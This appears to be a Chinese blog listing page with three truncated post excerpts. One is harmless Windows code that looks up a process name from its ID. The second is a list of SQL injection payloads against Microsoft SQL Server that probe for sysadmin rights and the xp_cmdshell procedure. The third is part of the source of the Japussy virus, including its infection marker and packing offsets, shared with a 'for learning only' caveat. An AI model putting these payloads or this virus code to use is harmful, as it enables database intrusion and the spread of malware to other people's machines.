摘要:
主要代码分析如下: //根据进程ID得到进程名称 BOOL processIdToName(LPTSTR lpszProcessName, DWORD PID) { HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 pe; pe.dwSize = sizeof(PROCESSENTRY32); if (!Process32First(hSnapshot, &pe)) { return FALSE; } while (Process32Next(hSnapshot, &am 阅读全文
摘要:
1. and 1=1 and 1=22. and user>0 and db_name()>0 and @@version>0 and 1=(select IS_SRVROLEMEMBER('sysadmin')) and 'sa'=(select system_user) and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell') and 1=(select count(*) from mas 阅读全文
摘要:
分享一下。但注明:提供只用于学习编程。为了安全起见,已修改一处。HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe} IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = 'If a race need 阅读全文